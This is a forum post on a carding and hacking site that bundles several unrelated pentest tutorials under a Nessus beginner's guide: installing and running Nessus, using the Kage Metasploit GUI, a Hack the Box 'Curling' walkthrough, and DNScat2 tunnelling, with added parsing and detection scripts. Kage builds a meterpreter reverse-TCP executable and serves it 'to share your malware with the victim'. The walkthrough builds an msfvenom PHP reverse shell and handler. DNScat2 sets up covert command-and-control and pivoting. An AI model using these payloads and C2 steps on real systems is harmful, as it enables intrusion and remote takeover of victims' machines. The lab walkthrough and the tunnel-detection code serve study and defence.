Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc

[Guide] For Beginner’s to Nessus
In this article, we will learn about Nessus, a network vulnerability scanner. There are various network vulnerability scanners, but Nessus is one of the best because of its very usable GUI, which is why it is widely used across organizations. The tool was developed by Renaud Deraison in 1998.
Table of Contents
  • Introduction to Nessus
  • Linux Installation
  • Running Vulnerability Scans
  • Windows Installation
Introduction to Nessus
Nessus is a network vulnerability scanner that uses the Common Vulnerabilities and Exposures (CVE) architecture for easy cross-linking between compliant security tools. Nessus uses the Nessus Attack Scripting Language (NASL), a simple language that describes individual threats and potential attacks. Nessus has a modular architecture consisting of centralized servers that conduct the scanning and remote clients that allow administrator interaction. Administrators can include NASL descriptions of all suspected vulnerabilities to build customized scans. Notable capabilities of Nessus include:
  • Compatible with all operating systems
  • Scans for vulnerabilities on local and remote hosts
  • Reports missing security updates in detail
  • Applies various attacks in order to pinpoint a vulnerability
  • Can schedule security audits
  • Runs security tests
Linux Installation
Let's start with the installation on Linux. Here we are installing Nessus on an Ubuntu 18 machine. First, we invoke a root shell with the sudo bash command. We are going to install Nessus from a .deb package downloaded from the official Nessus download page. We change to the directory where we downloaded the package and install it with the dpkg command. Note that dpkg -i installs the package, whereas dpkg -I only prints its metadata, and that dpkg only needs to read the file, so the chmod step below is not required (and 777 also makes the file world-writable, which you do not want for an installer):
chmod 777 Nessus-8.2.3-ubuntu910_amd64.deb
dpkg -i Nessus*.deb

[Image: 1.png?w=687&ssl=1]
Afterwards, start the Nessus service with the following command, as shown in the image:
/etc/init.d/nessusd start

[Image: 2.png?w=687&ssl=1]
This command starts the Nessus service; we then open Nessus in our default browser, which in our case is Mozilla Firefox, and are greeted with a warning about the certificate. To use Nessus, we have to get past this warning: first click on Advanced, followed by Accept the Risk and Continue.
[Image: 3.png?w=687&ssl=1]
Then it will ask you to create an account; fill in the details as shown in the image.
[Image: 4.png?w=687&ssl=1]
Further, it will ask you for an activation code; provide it as shown in the image below:
[Image: 5.png?w=687&ssl=1]
Once all the formalities are done, Nessus opens and lets you perform any scan you want, as shown in the image below:
[Image: 6.png?w=687&ssl=1]
Running Vulnerability Scans
When you click on create new scan, there are multiple scan types to choose from, as seen in the following image:
[Image: 7.png?w=687&ssl=1]
Then, in the policies tab, you can create the different policies on which scans are based.
[Image: 8.png?w=687&ssl=1]
There are various policy templates too, as shown in the image below:
[Image: 9.png?w=687&ssl=1]
In order to start a new scan, go to scan templates, select a new scan, and then give it a name and a target IP, as shown in the following image:
[Image: 10.png?w=687&ssl=1]
Once the scan is done, it will show you the results; each finding is rated by the risk it poses, from Low up to Critical.
[Image: 11.png?w=687&ssl=1]
When you click on a vulnerability, for instance here we clicked on the first one, which is a critical threat, it gives you details about the vulnerability such as its severity, whether it is RPC or not, its version, etc., as shown in the image below:
[Image: 12.png?w=687&ssl=1]
Next, we clicked on a different one, which is a high-level threat; it likewise gives you details such as its severity, whether it is RPC or not, its version, etc., as shown in the image below:
[Image: 13.png?w=687&ssl=1]
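Once a scan has finished, the Nessus GUI can export the findings as a .nessus file (XML). The following added example, which is not code from the original post or from Tenable, parses a constructed export in that format and groups the findings by the same Info-to-Critical severity the GUI shows, so that the Critical and High items can be worked first:

```python
"""Triage a Nessus export (.nessus v2 XML) by severity. Added example, not code
from the original post or from Tenable; the XML is a constructed sample that
uses the element names of the .nessus v2 format."""
import xml.etree.ElementTree as ET
from collections import Counter

# Nessus stores severity 0..4 on each ReportItem; the GUI shows these labels.
SEVERITY = {0: "Info", 1: "Low", 2: "Medium", 3: "High", 4: "Critical"}

# Constructed sample export. Plugin IDs and names are placeholders.
SAMPLE_NESSUS = """<?xml version="1.0" ?>
<NessusClientData_v2>
 <Report name="lab scan">
  <ReportHost name="192.0.2.10">
   <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="4"
               pluginID="900001" pluginName="PLACEHOLDER critical SMB finding">
    <risk_factor>Critical</risk_factor><cvss_base_score>10.0</cvss_base_score>
   </ReportItem>
   <ReportItem port="111" svc_name="rpc-portmapper" protocol="tcp" severity="3"
               pluginID="900002" pluginName="PLACEHOLDER high RPC finding">
    <risk_factor>High</risk_factor><cvss_base_score>7.5</cvss_base_score>
   </ReportItem>
   <ReportItem port="22" svc_name="ssh" protocol="tcp" severity="0"
               pluginID="900003" pluginName="PLACEHOLDER SSH banner">
    <risk_factor>None</risk_factor>
   </ReportItem>
  </ReportHost>
  <ReportHost name="192.0.2.11">
   <ReportItem port="80" svc_name="www" protocol="tcp" severity="2"
               pluginID="900004" pluginName="PLACEHOLDER medium web finding">
    <risk_factor>Medium</risk_factor><cvss_base_score>5.0</cvss_base_score>
   </ReportItem>
  </ReportHost>
 </Report>
</NessusClientData_v2>
"""


def parse_nessus(xml_text):
    """Return one dict per ReportItem, tagged with the host it belongs to.
    The export comes from your own scanner; for XML of unknown origin use
    defusedxml instead of ElementTree to block entity-expansion tricks."""
    findings = []
    for host in ET.fromstring(xml_text).iter("ReportHost"):
        for item in host.iter("ReportItem"):
            findings.append({
                "host": host.get("name"),
                "port": int(item.get("port")),
                "protocol": item.get("protocol"),
                "severity": int(item.get("severity")),
                "plugin_id": item.get("pluginID"),
                "plugin_name": item.get("pluginName"),
                "cvss": float(item.findtext("cvss_base_score") or 0.0),
            })
    return findings


def summarize(findings, min_severity=3):
    """Per-host counts by severity label, plus the findings at or above
    min_severity (High by default) sorted worst-first for remediation."""
    per_host = {}
    for f in findings:
        per_host.setdefault(f["host"], Counter())[SEVERITY[f["severity"]]] += 1
    actionable = sorted((f for f in findings if f["severity"] >= min_severity),
                        key=lambda f: (-f["severity"], -f["cvss"], f["host"]))
    return per_host, actionable


if __name__ == "__main__":
    hosts, todo = summarize(parse_nessus(SAMPLE_NESSUS))
    for host, counts in hosts.items():
        print(host, dict(counts))
    for f in todo:
        print(SEVERITY[f["severity"]], f["host"], f["port"], f["plugin_name"])
```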
Windows Installation
Download the Nessus installer for Windows from the official download page, run it, and then open Nessus in the browser in the same way to set it up.

[Image: 14.png?w=687&ssl=1]
Just like on Linux, we are greeted with a warning about the certificate. To use Nessus, we have to get past this warning: first click on Advanced, followed by Accept the Risk and Continue.
[Image: 15.png?w=687&ssl=1]
Then it will ask you to create an account; fill in the details as shown in the image.
[Image: 16.png?w=687&ssl=1]
Further, it will ask you for an activation code; provide it as shown in the image below:
[Image: 17.png?w=687&ssl=1]
And then you can start your scans in the same way as shown above for Linux.
[Image: 18.png?w=687&ssl=1]

Kage
Kage is a GUI for Metasploit RPC servers. It is a good tool for beginners to understand how Metasploit works, as it generates payloads and lets you interact with sessions. As this tool is still in development, until now it only supports windows/meterpreter and android/meterpreter. For it to work, you should have Metasploit installed on your system. The only dependency it requires is npm.
Installation
Use the following git command to install the Kage software:
git clone https://github.com/WayzDev/Kage.git

[Image: 1.png?w=687]
Go inside the Kage folder and install npm with the following command:
apt-get install npm

[Image: 2.png?w=687]
Further, use the following command to install the project's dependencies:
npm install

[Image: 3.png?w=687]
And then run it with the following command:
npm run dev

[Image: 4.png?w=687]
Once all the prerequisites are done, Kage will run. Click on the start server button as shown in the image below:
[Image: 5.png?w=687]
The server will start running. Once the process is done, click on the close button as shown in the image below:
[Image: 6.png?w=687]
After clicking on the close button, it will automatically fill in all the details, and then you can click on the connect button to connect, as shown in the image below:
[Image: 7.png?w=687]
Once you are connected, it will show you the following window:
[Image: 8.png?w=687]
Under the heading payload generator, you can give all the details such as file name (kage.exe), payload (windows/meterpreter/reverse_tcp), lhost (192.168.1.9), lport (5252) and then click on generate.
[Image: 9.png?w=687]
After clicking on generate, it will create a new folder named kage (with a small k). Here, run a python server so that you can share your malware with the victim. To run the python server, type:
python -m SimpleHTTPServer 80

[Image: 10.png?w=687]
Once the file is shared and executed, it will show the following details under the jobs heading :
[Image: 14.png?w=687]
And when you go to the sessions window through the dashboard, you will find that a new session has been created. Click on the interact button to access the session.
[Image: 15.png?w=687]
After clicking on the interact button, the following window will open. Here, the first tab shows you all the information about the system.
[Image: 16.png?w=687]
The second tab shows you all the processes that are running on the victim's PC.
[Image: 17.png?w=687]
And the third tab gives you all the information about its network. Here, you can run three commands through the buttons provided, namely ifconfig, netstat and route, as shown in the image below:
[Image: 18.png?w=687]

Hack the Box: Curling
Today we are going to solve another CTF challenge, "Curling". It is a retired vulnerable lab presented by Hack the Box to help pentesters practise online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.
Level: Intermediate
Task: To find the user.txt and root.txt files
Note: Since these labs are available online, they have a static IP. The IP of Curling is 10.10.10.150
Penetrating Methodology
  • Network scanning (Nmap)
  • Surfing the IP address on the browser
  • Finding the secret in the page source
  • Decoding Secret
  • Enumerating Joomla!
  • Creating Payload using msfvenom
  • Getting Meterpreter Session
  • Enumerate and Extract password files
  • Getting SSH Session
  • Grab User Flag
  • Enumerate for Root Flag
  • Getting the root flag
Walkthrough
Let's start off with our basic Nmap command to find the open ports and services.
nmap -sV -sC -T4 -p- 10.10.10.150

[Image: 1.png?w=687]
The Nmap scan shows 2 open ports: 22(SSH), 80(HTTP)
As port 80 is running HTTP service, we open the IP address in the web browser.
[Image: 2.png?w=687]
Here, we found two usernames, Floris and Super User. They might come in handy later on. Let's view the page source of the webpage.
[Image: 3.png?w=687]
The page source refers to a secret.txt; let's open it in the browser. It displayed a base64 encoded string.
[Image: 4.png?w=687]
Time to decode this base64 string. On decoding it we got Curling2018!, which can be used as a credential.
echo "Q3VybGluZzIwMTgh" | base64 -d

[Image: 5.png?w=687]
From previous experience with Joomla!, we already knew about its administrator login page. Not wasting any time, we directly opened the /administrator directory in the browser and logged in with the credentials:
Username- Floris
Password- Curling2018!
[Image: 6.png?w=687]
We have successfully logged in.
[Image: 7.png?w=687]
We created a PHP shell payload using msfvenom.
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.120 lport=443 -f raw

[Image: 8.png?w=687]
On the other side, we set up a listener using the Metasploit framework.
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost tun0
msf exploit(multi/handler) > set lport 443
msf exploit(multi/handler) > run

[Image: 9.png?w=687]
Let's try to upload the PHP reverse shell script we created with msfvenom. First navigate to /template/protostar/ on the webpage.
[Image: 10.png?w=687]
Finally, we got the meterpreter.
[Image: 11.png?w=687]
We got the reverse shell, but it is not a proper shell. We will spawn a TTY shell using python.
shell
python3 -c "import pty;pty.spawn('/bin/bash')"

[Image: 12.png?w=687]
After enumerating through directories, we found a useful file, password_backup. Let's check its contents. The contents of this file look like a hex dump.
ls -al
cat password_backup

[Image: 13.png?w=687]
Let's use the xxd tool, which creates a hex dump of a file or standard input; with -r it reverses a dump back into binary. After reversing it, the file command told us what we had, and on decompressing it we saw that the author of the machine had recursively compressed the password_backup file (bzip2, then gzip, then bzip2 again, around a tar archive). We need to decompress it layer by layer:
xxd -r password_backup > password
file password
mv password password.bz2
bzip2 -d password.bz2
ls
file password
mv password password.gz
gzip -d password.gz
ls
file password
mv password password.bz2
bzip2 -d password.bz2
ls
mv password password.tar
tar xvf password.tar
cat password.txt
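
The unwrapping above can be automated. The following added example (not code from the original walkthrough) reverses an xxd dump and peels bzip2, gzip and tar layers by their magic bytes, the same signatures the file command used to identify each layer; the nested sample it builds is constructed and contains no real password.

```python
"""Unwrap a layered archive like password_backup: reverse the xxd dump, then
peel compression layers by magic bytes until plain data is left.
Added example, not from the original walkthrough; the sample is constructed."""
import bz2
import gzip
import io
import tarfile


def from_xxd(dump):
    """Reverse an xxd hex dump back into bytes (what `xxd -r` does)."""
    out = bytearray()
    for line in dump.splitlines():
        if ":" not in line:
            continue                                  # not a dump line
        _, rest = line.split(":", 1)
        hex_part = rest.strip().split("  ", 1)[0]     # drop the ASCII column
        out += bytes.fromhex(hex_part.replace(" ", ""))
    return bytes(out)


def to_xxd(data):
    """Render bytes in xxd's default layout; used only to build the sample."""
    lines = []
    for off in range(0, len(data), 16):
        chunk = data[off:off + 16]
        hexs = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        text = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08x}: {hexs:<39}  {text}")
    return "\n".join(lines) + "\n"


def unwrap(blob, max_layers=16):
    """Peel bzip2, gzip and tar layers by magic bytes (as `file` identifies
    them) until none matches. Returns (payload, layer names outermost-first)."""
    layers = []
    for _ in range(max_layers):
        if blob.startswith(b"BZh"):
            blob, layer = bz2.decompress(blob), "bzip2"
        elif blob.startswith(b"\x1f\x8b"):
            blob, layer = gzip.decompress(blob), "gzip"
        elif len(blob) > 262 and blob[257:262] == b"ustar":
            with tarfile.open(fileobj=io.BytesIO(blob)) as tar:
                member = next(m for m in tar.getmembers() if m.isfile())
                blob = tar.extractfile(member).read()
            layer = "tar:" + member.name
        else:
            return blob, layers
        layers.append(layer)
    raise ValueError("gave up after %d layers" % max_layers)


def build_sample():
    """Constructed stand-in for password_backup: a tar holding password.txt,
    compressed bzip2 -> gzip -> bzip2 (innermost first) and dumped with xxd."""
    secret = b"constructed-sample-password\n"         # not the real flag
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo("password.txt")
        info.size = len(secret)
        tar.addfile(info, io.BytesIO(secret))
    blob = bz2.compress(gzip.compress(bz2.compress(buf.getvalue())))
    return to_xxd(blob)


if __name__ == "__main__":
    payload, layers = unwrap(from_xxd(build_sample()))
    print(" -> ".join(layers))
    print(payload.decode())
```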

The content found in password.txt might be the password to log into SSH. Let's find out if our intuition is right.
[Image: 14.png?w=687]
We have successfully logged into SSH using the password found in password.txt.
ssh floris@10.10.10.150

On exploring, we found user.txt and read its contents.
ls
cat user.txt

[Image: 16.png?w=687]
On further enumerating, we found two files, input and report, in the admin-area folder. Let's read the contents of both files.
cat input
wc -l report

[Image: 17.png?w=687]
After some thought, we decided to change the content of the input file using echo.
ls -al
echo "file:///root/root.txt" > input

[Image: 18.png?w=687]
It took us some time to think of this. We did it because we knew our final flag is inside /root/root.txt, and we had also learned that the output for the input file is saved in the report file.
After a while, when we opened the report file, we found our final flag and read its contents.
wc -l report
cat report

[Image: 19.png?w=687]

DNS Tunneling with DNScat2
In this article, we learn DNS tunneling through an excellent tool, DNScat2.
Table of Contents:
  • Introduction to DNS
  • Introduction to DNScat
  • Installation
  • DNS tunneling
  • Conclusion
Introduction to DNS
The Domain Name System (DNS) associates domain names (the host part of a URL) with their IP addresses. With DNS, it is possible to type words rather than a series of numbers into a browser, letting people find sites and send messages using familiar names. When you enter a domain name in a browser, it sends a query to the DNS server to match the domain with its IP. Once found, it uses the IP to fetch the site's content. Most impressively, this whole process takes only milliseconds. DNS uses port 53 for all of this.
Introduction to DNScat
DNScat is a widely praised tool because it can create a command-and-control tunnel over the DNS protocol, which lets an attacker work stealthily. You can access data, upload and download files, and get a shell. For this tool to work over port 53, you do not need authoritative control of a DNS server; you can simply establish your connection over port 53, which is faster and still looks like normal traffic. It does, however, leave a clear trace in the packet log.
DNScat is made of two components, a server and a client. To understand how dnscat works, it is important to understand both of these components.
The client is intended to run on a target machine. It is written in C and has minimal prerequisites. When you run the client, you normally specify a domain name. All packets are sent to the local DNS server, which then routes them to the authoritative DNS server for that domain (which you, presumably, control).
The server is intended to run on an authoritative DNS server. It is written in Ruby and depends on a few different gems. When you run it, much like the client, you specify which domain(s) it listens for on port 53. When it gets traffic for one of those domains, it attempts to establish a legitimate connection. Other traffic it receives is ignored by default, though it can also forward it upstream.
Installation
Run the following git command to download dnscat2:
git clone https://github.com/iagox86/dnscat2.git

[Image: 1.png?w=687]
Now install bundler, as it is a major dependency of dnscat2. To install it, go into the server directory of dnscat2 and type:
gem install bundler
bundle install

[Image: 2.png?w=687]
Once everything is done, the server runs with the following command:
ruby dnscat2.rb

[Image: 3.png?w=687]
Similarly, download dnscat2 on the client machine too, and use the make command in its client directory to compile it, as shown in the image below:
[Image: 4.png?w=687]
To establish a connection between client and server, use the following command:
./dnscat2 --dns-server=192.168.174.131,port=53

[Image: 5.png?w=687]
Once the connection is established, you can see on the server side that you have a session, as shown in the image below. You can use the command 'sessions' to list the sessions that have been created.
[Image: 6.png?w=687]
To interact with that session, type the following command:
session -i 1

Now that you have access to the session, type 'ping' to ping the target; if it replies 'Pong!' then your ping was successful.
[Image: 7.png?w=687]
The following will be the response on the client side to the ping command.
[Image: 8.png?w=687]
Further, with the help command you can see all the options that we can use to our advantage. If you want to go to a shell, just type 'shell' and it will open a new window with a session to interact with the shell of the target system.
[Image: 9.png?w=687]
To interact with the shell session that is opened in a new window, type the following set of commands:
windows
session -i 2

[Image: 10.png?w=687]
Once you are in the session, you can execute any shell command, like 'uname -a' as shown in the image above.
DNS Tunnelling
DNS tunnelling is the best attack possible through DNScat2. If, through ifconfig, you find two networks on your target system, as shown in the image below, you can easily perform DNS tunnelling.
[Image: 11.png?w=687]
For DNS tunnelling, type the following command (it forwards local port 888 through the session to port 22 on 10.0.0.10 in the second network):
listen 127.0.0.1:888 10.0.0.10:22

[Image: 12.png?w=687]
Now you can try to connect to the SSH port with the following command (<user> stands for the account on 10.0.0.10):
ssh <user>@127.0.0.1 -p 888

Then, once connected, you can use the 'ifconfig' command to see the network you have tunnelled into, as shown in the following image:
[Image: 13.png?w=687]
As you now have SSH control of the second network too, you can download DNScat2 on that network as well, in order to attack it. Once you have downloaded DNScat2 there, type the following command to run it and get a session on the DNScat2 server:
dnscat2.exe --dns=server=192.168.174.131,port=53

[Image: 14.png?w=687]
Once the above command is executed, you will have a new session that you can access with the following set of commands:
sessions
session -i 2

And once you have access to the session, you can run any command.
[Image: 15.png?w=687]
If you then run the systeminfo command, it will show you the details of the second system that you have gained access to through tunnelling.
[Image: 16.png?w=687]
Conclusion

Even in the most restricted environments, DNS traffic is usually allowed so that internal or external names can be resolved. That channel can be used for communication between a target host and a command-and-control server. Commands and data are embedded inside DNS queries and responses, which is why detection is difficult: arbitrary commands hide in plain sight because the traffic is perceived as legitimate. This is exactly what DNSCat takes advantage of, making it an effective attack tool.
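From the defender's side, the tunnel still has to carry its data inside query names for a domain the attacker controls, and that is where it can be spotted. The following added example (not from the original post or the dnscat2 project) scores each parent domain in a constructed resolver log by the length and entropy of its subdomain labels and by how many distinct names were queried; the thresholds are assumptions to tune for your own network.

```python
"""Heuristic detection of DNS tunnelling traffic of the kind dnscat2 generates.
Added example, not from the original post or the dnscat2 project; the resolver
log is constructed. Tunnelled data has to travel inside query names, so for
each parent domain we measure how long and how random the subdomain part is
and how many distinct names were requested."""
import math
from collections import defaultdict

# Constructed resolver log, one query per line: time client qtype qname
SAMPLE_LOG = """\
12:00:01 10.0.0.5 A www.example.com
12:00:02 10.0.0.5 A mail.example.com
12:00:02 10.0.0.5 AAAA www.example.com
12:00:03 10.0.0.7 TXT 0123456789abcdef0123456789abcdef.c2.example.net
12:00:03 10.0.0.7 CNAME 123456789abcdef0123456789abcdef0.c2.example.net
12:00:04 10.0.0.7 MX 23456789abcdef0123456789abcdef01.c2.example.net
12:00:04 10.0.0.7 TXT 3456789abcdef0123456789abcdef012.c2.example.net
"""

def shannon_entropy(s):
    """Bits per character; 0.0 for an empty or single-symbol string."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def split_name(qname):
    """(subdomain, parent) with parent = last two labels. Assumption: a real
    deployment should use the public suffix list instead."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])

def parse_log(text):
    """Return (client, qtype, qname) tuples; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            records.append((parts[1], parts[2].upper(), parts[3].lower()))
    return records

def score_domains(records):
    """Per parent domain: distinct names, mean subdomain length, mean entropy,
    and the share of queries using record types that carry large answers."""
    acc = defaultdict(lambda: {"names": set(), "lens": [], "ents": [], "bulky": 0})
    for _, qtype, qname in records:
        sub, parent = split_name(qname)
        a = acc[parent]
        a["names"].add(qname)
        a["lens"].append(len(sub))
        a["ents"].append(shannon_entropy(sub))
        a["bulky"] += qtype in ("TXT", "CNAME", "MX")
    return {p: {"unique_names": len(a["names"]),
                "mean_len": sum(a["lens"]) / len(a["lens"]),
                "mean_entropy": sum(a["ents"]) / len(a["ents"]),
                "bulky_ratio": a["bulky"] / len(a["lens"])}
            for p, a in acc.items()}

def flag_tunnels(scores, min_len=30, min_entropy=3.5, min_unique=3):
    """Domains whose subdomains are long, high-entropy and never repeat.
    Expect false positives from CDNs and anti-spam lookups; tune per network."""
    return sorted(p for p, s in scores.items()
                  if s["mean_len"] >= min_len and s["mean_entropy"] >= min_entropy
                  and s["unique_names"] >= min_unique)
```

Run against a real resolver log, this should be one signal among several (query volume per client, unusual record types, answer sizes) rather than a verdict on its own.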
[Guide] For Beginner’s to Nessus - by NINZA - 05-14-2020, 12:00 PM


